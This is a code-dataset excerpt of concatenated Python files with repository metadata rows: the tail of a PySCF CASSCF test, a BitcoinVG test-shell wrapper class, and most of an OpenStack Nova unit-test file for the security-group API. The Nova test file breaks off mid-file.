        ['O', ( 0., 0. , 0. )],
        ['H', ( 0., -0.757, 0.587)],
        ['H', ( 0., 0.757 , 0.587)],]
    mol.basis = {'H': 'cc-pvdz',
                 'O': 'cc-pvdz',}
    mol.build()

    m = scf.RHF(mol)
    ehf = m.scf()
    mc = CASSCF(m, 6, 4)
    mc.fcisolver = fci.solver(mol)
    mc.verbose = 4
    mo = addons.sort_mo(mc, m.mo_coeff, (3,4,6,7,8,9), 1)
    emc = mc.mc1step(mo)[0]
    print(ehf, emc, emc-ehf)
    #-76.0267656731 -76.0873922924 -0.0606266193028
    print(emc - -76.0873923174, emc - -76.0926176464)

    mc = CASSCF(m, 6, (3,1))
    mo = addons.sort_mo(mc, m.mo_coeff, (3,4,6,7,8,9), 1)
    #mc.fcisolver = fci.direct_spin1
    mc.fcisolver = fci.solver(mol, False)
    mc.verbose = 4
    emc = mc.mc1step(mo)[0]
    #mc.analyze()
    print(emc - -75.7155632535814)

    mc.internal_rotation = True
    emc = mc.mc1step(mo)[0]
    print(emc - -75.7155632535814)
| 41.619124 | 145 | 0.557689 |
ef5bc00488cfefa6e3f9bd272767e206fec3d597 | 2,412 | py | Python | test/functional/test_framework/test_shell.py | Cminor-pools/bitcoinvg | d47a3cf13e06f4fe03d965826f5309e6d5706470 | [
"MIT"
] | null | null | null | test/functional/test_framework/test_shell.py | Cminor-pools/bitcoinvg | d47a3cf13e06f4fe03d965826f5309e6d5706470 | [
"MIT"
] | null | null | null | test/functional/test_framework/test_shell.py | Cminor-pools/bitcoinvg | d47a3cf13e06f4fe03d965826f5309e6d5706470 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.test_framework import BitcoinVGTestFramework
class TestShell:
"""Wrapper Class for BitcoinVGTestFramework.
The TestShell class extends the BitcoinVGTestFramework
rpc & daemon process management functionality to external
python environments.
It is a singleton class, which ensures that users only
start a single TestShell at a time."""
class __TestShell(BitcoinVGTestFramework):
def set_test_params(self):
pass
def run_test(self):
pass
def setup(self, **kwargs):
if self.running:
print("TestShell is already running!")
return
# Num_nodes parameter must be set
# by BitcoinVGTestFramework child class.
self.num_nodes = 1
# User parameters override default values.
for key, value in kwargs.items():
if hasattr(self, key):
setattr(self, key, value)
elif hasattr(self.options, key):
setattr(self.options, key, value)
else:
raise KeyError(key + " not a valid parameter key!")
super().setup()
self.running = True
return self
def shutdown(self):
if not self.running:
print("TestShell is not running!")
else:
super().shutdown()
self.running = False
def reset(self):
if self.running:
print("Shutdown TestShell before resetting!")
else:
self.num_nodes = None
super().__init__()
instance = None
def __new__(cls):
# This implementation enforces singleton pattern, and will return the
# previously initialized instance if available
if not TestShell.instance:
TestShell.instance = TestShell.__TestShell()
TestShell.instance.running = False
return TestShell.instance
def __getattr__(self, name):
return getattr(self.instance, name)
def __setattr__(self, name, value):
return setattr(self.instance, name, value)
| 31.736842 | 77 | 0.597015 |
9669a3eb8a2abf40392b30f9a3d85c32caa02b32 | 67,511 | py | Python | nova/tests/unit/api/openstack/compute/contrib/test_security_groups.py | belmiromoreira/nova | d03ef34b0b1ed96a2f2bea1f5f01f09436c55125 | [
"Apache-2.0"
] | null | null | null | nova/tests/unit/api/openstack/compute/contrib/test_security_groups.py | belmiromoreira/nova | d03ef34b0b1ed96a2f2bea1f5f01f09436c55125 | [
"Apache-2.0"
] | 1 | 2019-01-02T01:30:35.000Z | 2019-01-02T01:38:02.000Z | nova/tests/unit/api/openstack/compute/contrib/test_security_groups.py | jeffrey4l/nova | 35375133398d862a61334783c1e7a90b95f34cdb | [
"Apache-2.0"
] | null | null | null | # Copyright 2011 OpenStack Foundation
# Copyright 2012 Justin Santa Barbara
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from mox3 import mox
from oslo_config import cfg
from oslo_serialization import jsonutils
import webob
from nova.api.openstack.compute.contrib import security_groups as secgroups_v2
from nova.api.openstack.compute.plugins.v3 import security_groups as \
secgroups_v21
from nova import compute
from nova.compute import power_state
from nova import context as context_maker
import nova.db
from nova import exception
from nova import objects
from nova.objects import instance as instance_obj
from nova import quota
from nova import test
from nova.tests.unit.api.openstack import fakes
from nova.tests.unit import fake_instance
CONF = cfg.CONF

# Stable instance UUIDs shared by the fake DB stubs below.
FAKE_UUID1 = 'a47ae74e-ab08-447f-8eee-ffd43fc46c16'
FAKE_UUID2 = 'c6e6430a-6563-4efa-9542-5e93c9e97d18'
class AttrDict(dict):
    """Dict whose keys are also readable as attributes (d.foo == d['foo']).

    Used to mimic DB row objects in the fake helpers below.
    """
    def __getattr__(self, k):
        # Raise AttributeError (not KeyError) for missing keys, as the
        # __getattr__ protocol requires, so hasattr()/getattr(..., default)
        # behave correctly.
        try:
            return self[k]
        except KeyError:
            raise AttributeError(k)
def security_group_template(**kwargs):
    """Build a security-group request dict, filling in default fields."""
    defaults = {'tenant_id': '123',
                'name': 'test',
                'description': 'test-description'}
    template = dict(defaults)
    template.update(kwargs)
    return template
def security_group_db(security_group, id=None):
    """Convert a security-group request dict into a fake DB row."""
    row = dict(security_group)
    # The DB model stores project_id rather than the API's tenant_id.
    if 'tenant_id' in row:
        row['project_id'] = row.pop('tenant_id')
    if id is not None:
        row['id'] = id
    row.setdefault('rules', [])
    row.setdefault('instances', [])
    return AttrDict(row)
def security_group_rule_template(**kwargs):
    """Build a security-group-rule dict with TCP/22 defaults."""
    defaults = {'ip_protocol': 'tcp',
                'from_port': 22,
                'to_port': 22,
                'parent_group_id': 2}
    rule = dict(defaults)
    rule.update(kwargs)
    return rule
def security_group_rule_db(rule, id=None):
    """Convert a rule dict into a fake DB row (renames ip_protocol).

    The *id* argument is accepted for symmetry with security_group_db
    but is currently unused.
    """
    row = dict(rule)
    if 'ip_protocol' in row:
        row['protocol'] = row.pop('ip_protocol')
    return AttrDict(row)
def return_server(context, server_id,
                  columns_to_join=None, use_slave=False):
    """DB-stub: return a running fake instance with the given id."""
    values = {'id': int(server_id),
              'power_state': 0x01,
              'host': "localhost",
              'uuid': FAKE_UUID1,
              'name': 'asdf'}
    return fake_instance.fake_db_instance(**values)
def return_server_by_uuid(context, server_uuid,
                          columns_to_join=None,
                          use_slave=False):
    """DB-stub: return a running fake instance carrying *server_uuid*."""
    values = {'id': 1,
              'power_state': 0x01,
              'host': "localhost",
              'uuid': server_uuid,
              'name': 'asdf'}
    return fake_instance.fake_db_instance(**values)
def return_non_running_server(context, server_id, columns_to_join=None):
    """DB-stub: return a fake instance that is powered off."""
    values = {'id': server_id,
              'power_state': power_state.SHUTDOWN,
              'uuid': FAKE_UUID1,
              'host': "localhost",
              'name': 'asdf'}
    return fake_instance.fake_db_instance(**values)
def return_security_group_by_name(context, project_id, group_name):
    """DB-stub: a security group of *group_name* attached to one server."""
    members = [{'id': 1, 'uuid': FAKE_UUID1}]
    return {'id': 1, 'name': group_name, "instances": members}
def return_security_group_without_instances(context, project_id, group_name):
    """DB-stub: a security group with no instance associations."""
    group = {'id': 1}
    group['name'] = group_name
    return group
def return_server_nonexistent(context, server_id, columns_to_join=None):
    """DB-stub: simulate a missing instance row."""
    raise exception.InstanceNotFound(instance_id=server_id)
class TestSecurityGroupsV21(test.TestCase):
    # Controller classes under test; subclasses may override these to
    # exercise other API versions.
    secgrp_ctl_cls = secgroups_v21.SecurityGroupController
    server_secgrp_ctl_cls = secgroups_v21.ServerSecurityGroupController
    secgrp_act_ctl_cls = secgroups_v21.SecurityGroupActionController
def setUp(self):
    """Instantiate the controllers and pick a fake id whose format
    matches the backend's id type (UUID string vs integer string).
    """
    super(TestSecurityGroupsV21, self).setUp()

    self.controller = self.secgrp_ctl_cls()
    self.server_controller = self.server_secgrp_ctl_cls()
    self.manager = self.secgrp_act_ctl_cls()

    # This needs to be done here to set fake_id because the derived
    # class needs to be called first if it wants to set
    # 'security_group_api' and this setUp method needs to be called.
    if self.controller.security_group_api.id_is_uuid:
        self.fake_id = '11111111-1111-1111-1111-111111111111'
    else:
        self.fake_id = '11111111'
def _assert_no_security_groups_reserved(self, context):
    """Check that no reservations are leaked during tests."""
    # A failed create must roll its quota reservation back.
    result = quota.QUOTAS.get_project_quotas(context, context.project_id)
    self.assertEqual(result['security_groups']['reserved'], 0)
def _assert_security_groups_in_use(self, project_id, user_id, in_use):
    # Verify the per-user 'security_groups' usage counter.
    context = context_maker.get_admin_context()
    result = quota.QUOTAS.get_user_quotas(context, project_id, user_id)
    self.assertEqual(result['security_groups']['in_use'], in_use)
def test_create_security_group(self):
    """A minimal valid request creates the group and echoes its fields."""
    sg = security_group_template()

    req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
    res_dict = self.controller.create(req, {'security_group': sg})
    self.assertEqual(res_dict['security_group']['name'], 'test')
    self.assertEqual(res_dict['security_group']['description'],
                     'test-description')
def test_create_security_group_with_no_name(self):
    """A request missing 'name' is rejected and leaks no reservation."""
    sg = security_group_template()
    del sg['name']

    req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
    # NOTE(review): unlike the sibling tests, the body is passed without
    # the {'security_group': ...} wrapper -- confirm this is intentional.
    self.assertRaises(webob.exc.HTTPBadRequest,
                      self.controller.create, req, sg)

    self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_with_no_description(self):
    """A request missing 'description' is rejected with 400."""
    sg = security_group_template()
    del sg['description']

    req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
    self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
                      req, {'security_group': sg})

    self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_with_empty_description(self):
    """An empty description yields 400 with a specific explanation."""
    sg = security_group_template()
    sg['description'] = ""

    req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
    try:
        self.controller.create(req, {'security_group': sg})
        self.fail('Should have raised BadRequest exception')
    except webob.exc.HTTPBadRequest as exc:
        self.assertEqual('description has a minimum character requirement'
                         ' of 1.', exc.explanation)
    except exception.InvalidInput:
        # The API layer must translate InvalidInput into an HTTP error.
        self.fail('Should have raised BadRequest exception instead of')
    self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_with_blank_name(self):
    """An empty-string name is rejected with 400."""
    sg = security_group_template(name='')

    req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
    self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
                      req, {'security_group': sg})

    self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_with_whitespace_name(self):
    """A whitespace-only name is rejected with 400."""
    sg = security_group_template(name=' ')

    req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
    self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
                      req, {'security_group': sg})

    self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_with_blank_description(self):
    """An empty-string description is rejected."""
    group = security_group_template(description='')

    request = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
    self.assertRaises(webob.exc.HTTPBadRequest,
                      self.controller.create, request,
                      {'security_group': group})
    self._assert_no_security_groups_reserved(
        request.environ['nova.context'])
def test_create_security_group_with_whitespace_description(self):
    """A whitespace-only description is rejected."""
    group = security_group_template(description=' ')

    request = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
    self.assertRaises(webob.exc.HTTPBadRequest,
                      self.controller.create, request,
                      {'security_group': group})
    self._assert_no_security_groups_reserved(
        request.environ['nova.context'])
def test_create_security_group_with_duplicate_name(self):
    """Creating two groups with the same name must fail on the second."""
    sg = security_group_template()

    # FIXME: Stub out _get instead of creating twice
    req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
    self.controller.create(req, {'security_group': sg})

    req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
    self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
                      req, {'security_group': sg})
    self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_with_no_body(self):
    """A missing request body yields HTTPBadRequest."""
    request = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
    self.assertRaises(webob.exc.HTTPBadRequest,
                      self.controller.create, request, None)
    self._assert_no_security_groups_reserved(
        request.environ['nova.context'])
def test_create_security_group_with_no_security_group(self):
    """A body without the 'security_group' key is rejected."""
    payload = {'no-securityGroup': None}

    request = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
    self.assertRaises(webob.exc.HTTPBadRequest,
                      self.controller.create, request, payload)
    self._assert_no_security_groups_reserved(
        request.environ['nova.context'])
def test_create_security_group_above_255_characters_name(self):
    """A 260-character name exceeds the 255 limit and is rejected."""
    group = security_group_template(name='1234567890' * 26)

    request = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
    self.assertRaises(webob.exc.HTTPBadRequest,
                      self.controller.create, request,
                      {'security_group': group})
    self._assert_no_security_groups_reserved(
        request.environ['nova.context'])
def test_create_security_group_above_255_characters_description(self):
    """A 260-character description exceeds the 255 limit and is rejected."""
    group = security_group_template(description='1234567890' * 26)

    request = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
    self.assertRaises(webob.exc.HTTPBadRequest,
                      self.controller.create, request,
                      {'security_group': group})
    self._assert_no_security_groups_reserved(
        request.environ['nova.context'])
def test_create_security_group_non_string_name(self):
    """A non-string name (integer) is rejected."""
    group = security_group_template(name=12)

    request = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
    self.assertRaises(webob.exc.HTTPBadRequest,
                      self.controller.create, request,
                      {'security_group': group})
    self._assert_no_security_groups_reserved(
        request.environ['nova.context'])
def test_create_security_group_non_string_description(self):
    """A non-string description (integer) is rejected."""
    group = security_group_template(description=12)

    request = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
    self.assertRaises(webob.exc.HTTPBadRequest,
                      self.controller.create, request,
                      {'security_group': group})
    self._assert_no_security_groups_reserved(
        request.environ['nova.context'])
def test_create_security_group_quota_limit(self):
    """Creating groups up to the quota succeeds; one more is forbidden."""
    req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
    # Loop starts at 1 so quota - 1 groups are created here; presumably
    # the tenant's pre-existing 'default' group accounts for the last
    # slot -- TODO confirm against the fixture setup.
    for num in range(1, CONF.quota_security_groups):
        name = 'test%s' % num
        sg = security_group_template(name=name)
        res_dict = self.controller.create(req, {'security_group': sg})
        self.assertEqual(res_dict['security_group']['name'], name)

    sg = security_group_template()
    # One creation beyond the quota must be rejected with HTTPForbidden.
    self.assertRaises(webob.exc.HTTPForbidden, self.controller.create,
                      req, {'security_group': sg})
def test_get_security_group_list(self):
    """Index returns every group of the project exactly as stored."""
    groups = []
    for i, name in enumerate(['default', 'test']):
        sg = security_group_template(id=i + 1,
                                     name=name,
                                     description=name + '-desc',
                                     rules=[])
        groups.append(sg)
    expected = {'security_groups': groups}

    def return_security_groups(context, project_id):
        # Back the db layer with the fixture groups above.
        return [security_group_db(sg) for sg in groups]

    self.stubs.Set(nova.db, 'security_group_get_by_project',
                   return_security_groups)

    req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
    res_dict = self.controller.index(req)

    self.assertEqual(res_dict, expected)
def test_get_security_group_list_missing_group_id_rule(self):
    """Index drops the rule whose source group was deleted (rule2).

    Only rule1 survives into the expected response; rule2 references
    'HAS_BEEN_DELETED' and is absent from the expected rules list.
    """
    groups = []
    rule1 = security_group_rule_template(cidr='10.2.3.124/24',
                                         parent_group_id=1,
                                         group_id={}, id=88,
                                         protocol='TCP')
    rule2 = security_group_rule_template(cidr='10.2.3.125/24',
                                         parent_group_id=1,
                                         id=99, protocol=88,
                                         group_id='HAS_BEEN_DELETED')
    sg = security_group_template(id=1,
                                 name='test',
                                 description='test-desc',
                                 rules=[rule1, rule2])

    groups.append(sg)
    # An expected rule here needs to be created as the api returns
    # different attributes on the rule for a response than what was
    # passed in. For example:
    #  "cidr": "0.0.0.0/0" ->"ip_range": {"cidr": "0.0.0.0/0"}
    expected_rule = security_group_rule_template(
        ip_range={'cidr': '10.2.3.124/24'}, parent_group_id=1,
        group={}, id=88, ip_protocol='TCP')
    expected = security_group_template(id=1,
                                       name='test',
                                       description='test-desc',
                                       rules=[expected_rule])

    expected = {'security_groups': [expected]}

    def return_security_groups(context, project, search_opts):
        return [security_group_db(sg) for sg in groups]

    self.stubs.Set(self.controller.security_group_api, 'list',
                   return_security_groups)

    req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
    res_dict = self.controller.index(req)

    self.assertEqual(res_dict, expected)
def test_get_security_group_list_all_tenants(self):
    """Admin with all_tenants=1 sees every group; otherwise only its own."""
    all_groups = []
    tenant_groups = []

    for i, name in enumerate(['default', 'test']):
        sg = security_group_template(id=i + 1,
                                     name=name,
                                     description=name + '-desc',
                                     rules=[])
        all_groups.append(sg)
        if name == 'default':
            tenant_groups.append(sg)

    # Renamed from 'all' so the builtin of the same name is not shadowed.
    expected_all = {'security_groups': all_groups}
    tenant_specific = {'security_groups': tenant_groups}

    def return_all_security_groups(context):
        return [security_group_db(sg) for sg in all_groups]

    self.stubs.Set(nova.db, 'security_group_get_all',
                   return_all_security_groups)

    def return_tenant_security_groups(context, project_id):
        return [security_group_db(sg) for sg in tenant_groups]

    self.stubs.Set(nova.db, 'security_group_get_by_project',
                   return_tenant_security_groups)

    path = '/v2/fake/os-security-groups'

    # Without the all_tenants flag an admin still only sees its tenant.
    req = fakes.HTTPRequest.blank(path, use_admin_context=True)
    res_dict = self.controller.index(req)
    self.assertEqual(res_dict, tenant_specific)

    # With all_tenants=1 the full cross-tenant list is returned.
    req = fakes.HTTPRequest.blank('%s?all_tenants=1' % path,
                                  use_admin_context=True)
    res_dict = self.controller.index(req)
    self.assertEqual(res_dict, expected_all)
def test_get_security_group_by_instance(self):
    """Server index returns the groups attached to the given instance."""
    groups = []
    for i, name in enumerate(['default', 'test']):
        sg = security_group_template(id=i + 1,
                                     name=name,
                                     description=name + '-desc',
                                     rules=[])
        groups.append(sg)
    expected = {'security_groups': groups}

    def return_instance(context, server_id,
                        columns_to_join=None, use_slave=False):
        # Both stubs assert the lookup used the expected instance uuid.
        self.assertEqual(server_id, FAKE_UUID1)
        return return_server_by_uuid(context, server_id)

    self.stubs.Set(nova.db, 'instance_get_by_uuid',
                   return_instance)

    def return_security_groups(context, instance_uuid):
        self.assertEqual(instance_uuid, FAKE_UUID1)
        return [security_group_db(sg) for sg in groups]

    self.stubs.Set(nova.db, 'security_group_get_by_instance',
                   return_security_groups)

    req = fakes.HTTPRequest.blank('/v2/%s/servers/%s/os-security-groups' %
                                  ('fake', FAKE_UUID1))
    res_dict = self.server_controller.index(req, FAKE_UUID1)

    self.assertEqual(res_dict, expected)
@mock.patch('nova.db.instance_get_by_uuid')
@mock.patch('nova.db.security_group_get_by_instance', return_value=[])
def test_get_security_group_empty_for_instance(self, mock_sec_group,
                                               mock_db_get_ins):
    """An instance with no groups yields an empty security_groups list."""
    expected = {'security_groups': []}

    def return_instance(context, server_id,
                        columns_to_join=None, use_slave=False):
        self.assertEqual(server_id, FAKE_UUID1)
        return return_server_by_uuid(context, server_id)
    mock_db_get_ins.side_effect = return_instance
    req = fakes.HTTPRequest.blank('/v2/%s/servers/%s/os-security-groups' %
                                  ('fake', FAKE_UUID1))
    res_dict = self.server_controller.index(req, FAKE_UUID1)
    self.assertEqual(expected, res_dict)
    # The db layer must have been queried exactly once for this instance.
    mock_sec_group.assert_called_once_with(req.environ['nova.context'],
                                           FAKE_UUID1)
def test_get_security_group_by_instance_non_existing(self):
    """Listing groups for a missing server returns HTTPNotFound."""
    self.stubs.Set(nova.db, 'instance_get', return_server_nonexistent)
    self.stubs.Set(nova.db, 'instance_get_by_uuid',
                   return_server_nonexistent)
    request = fakes.HTTPRequest.blank(
        '/v2/fake/servers/1/os-security-groups')
    self.assertRaises(webob.exc.HTTPNotFound,
                      self.server_controller.index, request, '1')
def test_get_security_group_by_instance_invalid_id(self):
    """An invalid server id yields HTTPNotFound from the server index."""
    request = fakes.HTTPRequest.blank(
        '/v2/fake/servers/invalid/os-security-groups')
    self.assertRaises(webob.exc.HTTPNotFound,
                      self.server_controller.index, request, 'invalid')
def test_get_security_group_by_id(self):
    """Show returns the group whose id was requested."""
    sg = security_group_template(id=2, rules=[])

    def return_security_group(context, group_id):
        # Assert the controller looked up the id it was given.
        self.assertEqual(sg['id'], group_id)
        return security_group_db(sg)

    self.stubs.Set(nova.db, 'security_group_get',
                   return_security_group)

    req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups/2')
    res_dict = self.controller.show(req, '2')

    expected = {'security_group': sg}
    self.assertEqual(res_dict, expected)
def test_get_security_group_by_invalid_id(self):
    """An id that fails validation yields HTTPBadRequest."""
    req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups/invalid')
    # NOTE(review): despite the "get" name this invokes controller.delete,
    # not controller.show -- presumably both share the same id validation;
    # confirm whether show was intended here.
    self.assertRaises(webob.exc.HTTPBadRequest, self.controller.delete,
                      req, 'invalid')
def test_get_security_group_by_non_existing_id(self):
    """A well-formed but unknown id yields HTTPNotFound."""
    req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups/%s' %
                                  self.fake_id)
    # NOTE(review): despite the "get" name this invokes controller.delete,
    # not controller.show -- confirm whether show was intended here.
    self.assertRaises(webob.exc.HTTPNotFound, self.controller.delete,
                      req, self.fake_id)
def test_update_security_group(self):
    """Update persists the new name/description and returns the result."""
    sg = security_group_template(id=2, rules=[])
    sg_update = security_group_template(id=2, rules=[],
                                        name='update_name',
                                        description='update_desc')

    def return_security_group(context, group_id):
        self.assertEqual(sg['id'], group_id)
        return security_group_db(sg)

    def return_update_security_group(context, group_id, values,
                                     columns_to_join=None):
        # Assert the exact values the controller writes to the db.
        self.assertEqual(sg_update['id'], group_id)
        self.assertEqual(sg_update['name'], values['name'])
        self.assertEqual(sg_update['description'], values['description'])
        return security_group_db(sg_update)

    self.stubs.Set(nova.db, 'security_group_update',
                   return_update_security_group)
    self.stubs.Set(nova.db, 'security_group_get',
                   return_security_group)

    req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups/2')
    res_dict = self.controller.update(req, '2',
                                      {'security_group': sg_update})

    expected = {'security_group': sg_update}
    self.assertEqual(res_dict, expected)
def test_update_security_group_name_to_default(self):
    """Renaming a group to 'default' is rejected."""
    sg = security_group_template(id=2, rules=[], name='default')

    def return_security_group(context, group_id):
        self.assertEqual(sg['id'], group_id)
        return security_group_db(sg)

    self.stubs.Set(nova.db, 'security_group_get',
                   return_security_group)

    req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups/2')
    self.assertRaises(webob.exc.HTTPBadRequest, self.controller.update,
                      req, '2', {'security_group': sg})
def test_update_default_security_group_fail(self):
    """The 'default' group itself may not be updated."""
    group = security_group_template()

    request = fakes.HTTPRequest.blank('/v2/fake/os-security-groups/1')
    self.assertRaises(webob.exc.HTTPBadRequest, self.controller.update,
                      request, '1', {'security_group': group})
def test_delete_security_group_by_id(self):
    """Delete looks up the group and calls security_group_destroy."""
    sg = security_group_template(id=1, project_id='fake_project',
                                 user_id='fake_user', rules=[])
    self.called = False

    def security_group_destroy(context, id):
        # Flag flipped by the stub proves the destroy call was reached.
        self.called = True

    def return_security_group(context, group_id):
        self.assertEqual(sg['id'], group_id)
        return security_group_db(sg)

    self.stubs.Set(nova.db, 'security_group_destroy',
                   security_group_destroy)
    self.stubs.Set(nova.db, 'security_group_get',
                   return_security_group)

    req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups/1')
    self.controller.delete(req, '1')

    self.assertTrue(self.called)
def test_delete_security_group_by_admin(self):
    """Deleting as admin releases the quota usage it consumed."""
    sg = security_group_template()
    req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
    self.controller.create(req, {'security_group': sg})
    context = req.environ['nova.context']

    # Ensure quota usage for security group is correct.
    self._assert_security_groups_in_use(context.project_id,
                                        context.user_id, 2)

    # Delete the security group by admin.
    req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups/2',
                                  use_admin_context=True)
    self.controller.delete(req, '2')

    # Ensure quota for security group in use is released.
    self._assert_security_groups_in_use(context.project_id,
                                        context.user_id, 1)
def test_delete_security_group_by_invalid_id(self):
    """Deleting with a malformed id yields HTTPBadRequest."""
    request = fakes.HTTPRequest.blank(
        '/v2/fake/os-security-groups/invalid')
    self.assertRaises(webob.exc.HTTPBadRequest, self.controller.delete,
                      request, 'invalid')
def test_delete_security_group_by_non_existing_id(self):
    """Deleting a well-formed but unknown id yields HTTPNotFound."""
    request = fakes.HTTPRequest.blank(
        '/v2/fake/os-security-groups/%s' % self.fake_id)
    self.assertRaises(webob.exc.HTTPNotFound, self.controller.delete,
                      request, self.fake_id)
def test_delete_security_group_in_use(self):
    """A group reported as in use by the db may not be deleted."""
    sg = security_group_template(id=1, rules=[])

    def security_group_in_use(context, id):
        # Pretend the group is attached to at least one instance.
        return True

    def return_security_group(context, group_id):
        self.assertEqual(sg['id'], group_id)
        return security_group_db(sg)

    self.stubs.Set(nova.db, 'security_group_in_use',
                   security_group_in_use)
    self.stubs.Set(nova.db, 'security_group_get',
                   return_security_group)

    req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups/1')
    self.assertRaises(webob.exc.HTTPBadRequest, self.controller.delete,
                      req, '1')
def test_associate_by_non_existing_security_group_name(self):
    """Adding an unknown group name to a server yields HTTPNotFound."""
    self.stubs.Set(nova.db, 'instance_get', return_server)
    self.assertEqual(return_server(None, '1'),
                     nova.db.instance_get(None, '1'))
    payload = {'addSecurityGroup': {'name': 'non-existing'}}

    request = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
    self.assertRaises(webob.exc.HTTPNotFound,
                      self.manager._addSecurityGroup, request, '1',
                      payload)
def test_associate_by_invalid_server_id(self):
    """Associating to an invalid server id yields HTTPNotFound."""
    payload = {'addSecurityGroup': {'name': 'test'}}

    request = fakes.HTTPRequest.blank('/v2/fake/servers/invalid/action')
    self.assertRaises(webob.exc.HTTPNotFound,
                      self.manager._addSecurityGroup, request, 'invalid',
                      payload)
def test_associate_without_body(self):
    """A null addSecurityGroup payload yields HTTPBadRequest."""
    self.stubs.Set(nova.db, 'instance_get', return_server)
    payload = {'addSecurityGroup': None}

    request = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
    self.assertRaises(webob.exc.HTTPBadRequest,
                      self.manager._addSecurityGroup, request, '1',
                      payload)
def test_associate_no_security_group_name(self):
    """An addSecurityGroup payload without a name yields HTTPBadRequest."""
    self.stubs.Set(nova.db, 'instance_get', return_server)
    payload = {'addSecurityGroup': {}}

    request = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
    self.assertRaises(webob.exc.HTTPBadRequest,
                      self.manager._addSecurityGroup, request, '1',
                      payload)
def test_associate_security_group_name_with_whitespaces(self):
    """A whitespace-only group name yields HTTPBadRequest."""
    self.stubs.Set(nova.db, 'instance_get', return_server)
    payload = {'addSecurityGroup': {'name': " "}}

    request = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
    self.assertRaises(webob.exc.HTTPBadRequest,
                      self.manager._addSecurityGroup, request, '1',
                      payload)
def test_associate_non_existing_instance(self):
    """Associating to a missing instance yields HTTPNotFound."""
    self.stubs.Set(nova.db, 'instance_get', return_server_nonexistent)
    self.stubs.Set(nova.db, 'instance_get_by_uuid',
                   return_server_nonexistent)
    payload = {'addSecurityGroup': {'name': "test"}}

    request = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
    self.assertRaises(webob.exc.HTTPNotFound,
                      self.manager._addSecurityGroup, request, '1',
                      payload)
def test_associate_non_running_instance(self):
    """Associating a group with a non-running instance succeeds."""
    self.stubs.Set(nova.db, 'instance_get', return_non_running_server)
    self.stubs.Set(nova.db, 'instance_get_by_uuid',
                   return_non_running_server)
    self.stubs.Set(nova.db, 'security_group_get_by_name',
                   return_security_group_without_instances)
    payload = {'addSecurityGroup': {'name': "test"}}

    request = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
    self.manager._addSecurityGroup(request, '1', payload)
def test_associate_already_associated_security_group_to_instance(self):
    """Re-adding a group already on the instance yields HTTPBadRequest."""
    self.stubs.Set(nova.db, 'instance_get', return_server)
    self.stubs.Set(nova.db, 'instance_get_by_uuid',
                   return_server_by_uuid)
    self.stubs.Set(nova.db, 'security_group_get_by_name',
                   return_security_group_by_name)
    payload = {'addSecurityGroup': {'name': "test"}}

    request = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
    self.assertRaises(webob.exc.HTTPBadRequest,
                      self.manager._addSecurityGroup, request, '1',
                      payload)
def test_associate(self):
    """Happy path: the group is added via instance_add_security_group."""
    self.stubs.Set(nova.db, 'instance_get', return_server)
    self.stubs.Set(nova.db, 'instance_get_by_uuid',
                   return_server_by_uuid)
    # Record the expectation of exactly one instance_add_security_group
    # call; mox verifies it when the test tears down.
    self.mox.StubOutWithMock(nova.db, 'instance_add_security_group')
    nova.db.instance_add_security_group(mox.IgnoreArg(),
                                        mox.IgnoreArg(),
                                        mox.IgnoreArg())
    self.stubs.Set(nova.db, 'security_group_get_by_name',
                   return_security_group_without_instances)
    self.mox.ReplayAll()

    body = dict(addSecurityGroup=dict(name="test"))

    req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
    self.manager._addSecurityGroup(req, '1', body)
